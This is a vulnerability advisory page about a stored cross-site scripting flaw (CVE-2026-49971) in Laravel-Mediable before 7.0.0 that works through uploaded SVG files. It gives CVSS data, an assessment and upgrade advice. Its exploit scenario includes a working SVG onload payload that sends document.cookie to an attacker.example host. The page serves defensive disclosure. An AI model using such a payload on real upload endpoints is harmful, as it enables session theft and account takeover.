Laravel-Mediable
CVE-2026-49971
MEDIUM
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network upload path needs no auth (PR:N); victim must open SVG (UI:R); XSS changes scope to victim browser (S:C) with limited cookie/CSRF impact (C:L/I:L).
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Laravel-Mediable before 7.0.0 contains a stored cross-site scripting vulnerability that allows authenticated or anonymous users to execute arbitrary JavaScript by uploading unsanitized SVG files containing embedded scripts in onload event handlers, script tags, or foreignObject elements. Attackers can store persistent XSS payloads in uploaded SVG files that execute with full DOM access when victims open or preview the file, enabling session cookie theft, CSRF token capture, and account takeover.
AnalysisAI
Stored XSS in Laravel-Mediable before 7.0.0 allows network-accessible, unauthenticated attackers to persist malicious JavaScript payloads by uploading crafted SVG files containing embedded scripts in onload handlers, script tags, or foreignObject elements. When any authenticated user subsequently opens or previews a poisoned file in their browser, the payload executes with full DOM access, enabling session cookie theft, CSRF token capture, and complete account takeover. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three concrete conditions to align: (1) the target application uses Laravel-Mediable before 7.0.0; (2) the application permits upload of SVG files (either by anonymous or authenticated users - the description and PR:N metric confirm no privilege prerequisite for the upload step); and (3) the application or a feature within it renders stored SVG files inline in a browser context rather than forcing file download, causing the browser to parse and execute embedded scripts. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 5.3 (Medium) with vector AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N accurately characterises this as a stored XSS affecting the subsequent system (victim browser) rather than the server itself, with limited per-victim confidentiality and integrity impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker submits an SVG file containing the payload <svg xmlns='http://www.w3.org/2000/svg' onload='fetch("https://attacker.example/c?s="+document.cookie)'></svg> to a publicly accessible upload endpoint - no account required if anonymous uploads are permitted. The file is stored unmodified on the server. … |
| Remediation | Upgrade Laravel-Mediable to version 7.0.0, which the vendor has explicitly designated a security release and for which upgrade is strongly recommended. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Laravel Mediable
View allArbitrary file write in the Plank Laravel-Mediable package (before 7.0.0) lets an attacker who influences the destinatio
Remote code execution in the plank/laravel-mediable package before 7.0.0 lets attackers upload a double-extension file s
Server-side request forgery in Laravel-Mediable before 7.0.0 enables network-accessible, low-privilege attackers to issu
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today